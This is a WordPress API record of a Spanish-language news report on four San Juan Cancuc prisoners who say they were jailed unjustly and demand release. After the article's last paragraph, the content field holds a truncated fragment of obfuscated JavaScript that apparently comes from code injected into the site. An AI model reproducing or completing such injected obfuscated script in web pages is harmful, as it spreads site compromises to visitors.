{"id":15288,"date":"2024-04-24T01:41:37","date_gmt":"2024-04-24T01:41:37","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15288"},"modified":"2024-04-24T01:42:17","modified_gmt":"2024-04-24T01:42:17","slug":"presos-de-san-juan-cancuc-claman-justicia-por-ser-encarcelados-injustamente","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15288","title":{"rendered":"Presos  de San Juan Cancuc claman justicia por ser encarcelados injustamente"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"720\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240423-WA0203.jpg\" alt=\"\" class=\"wp-image-15289\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240423-WA0203.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240423-WA0203-300x300.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240423-WA0203-150x150.jpg 150w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<br>23 de abril del 2024. San Crist\u00f3bal.-A trav\u00e9s de un comunicado dirigido a la opini\u00f3n p\u00fablica, los presos de San Juan Canc\u00fax expresaron su desesperaci\u00f3n y demandaron justicia, al cumplir casi dos a\u00f1os de encarcelamiento por un delito que aseguran no haber cometido.<\/p>\n\n\n\n<p>&#8220;Ya casi vamos cumpliendo 2 a\u00f1os presos por un delito que no hemos cometido&#8221;, expresaron en el escrito, y denunciaron una injusta sentencia de 25 a\u00f1os de prisi\u00f3n. En palabras de los afectados, este tiempo tras las rejas les ha robado la posibilidad de estar con sus familias, de ver crecer a sus hijos, pero no ha podido arrebatarles su dignidad ni la esperanza de obtener justicia.<\/p>\n\n\n\n<p>Asimismo, exigieron su liberaci\u00f3n inmediata a los tres niveles de gobierno, e hicieron un llamado a la solidaridad de la comunidad para respaldar su lucha. &#8220;Les pedimos a los compas seguir solidariz\u00e1ndose por nuestra lucha&#8221;, agregaron en el comunicado.<\/p>\n\n\n\n<p>Asimismo, denunciaron la existencia de testigos falsos y la fabricaci\u00f3n de delitos en su contra, demandando un alto a estas pr\u00e1cticas injustas. Los nombres de los presos que firman el comunicado son: Agust\u00edn P\u00e9rez Dom\u00ednguez<br>Agust\u00edn P\u00e9rez Velasco<br>Mart\u00edn P\u00e9rez Dom\u00ednguez<br>Juan Velasco Aguilar<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal23 de abril del 2024. San Crist\u00f3bal.-A trav\u00e9s de un comunicado dirigido a la opini\u00f3n p\u00fablica, los presos de San Juan Canc\u00fax expresaron su desesperaci\u00f3n y demandaron justicia, al cumplir casi dos a\u00f1os de encarcelamiento por un delito que aseguran no haber cometido. &#8220;Ya casi vamos cumpliendo 2 a\u00f1os presos por un delito &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15289,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15288","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15288","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15288"}],"version-history":[{"count":2,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15288\/revisions"}],"predecessor-version":[{"id":15292,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15288\/revisions\/15292"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15289"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15288"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15288"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15288"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}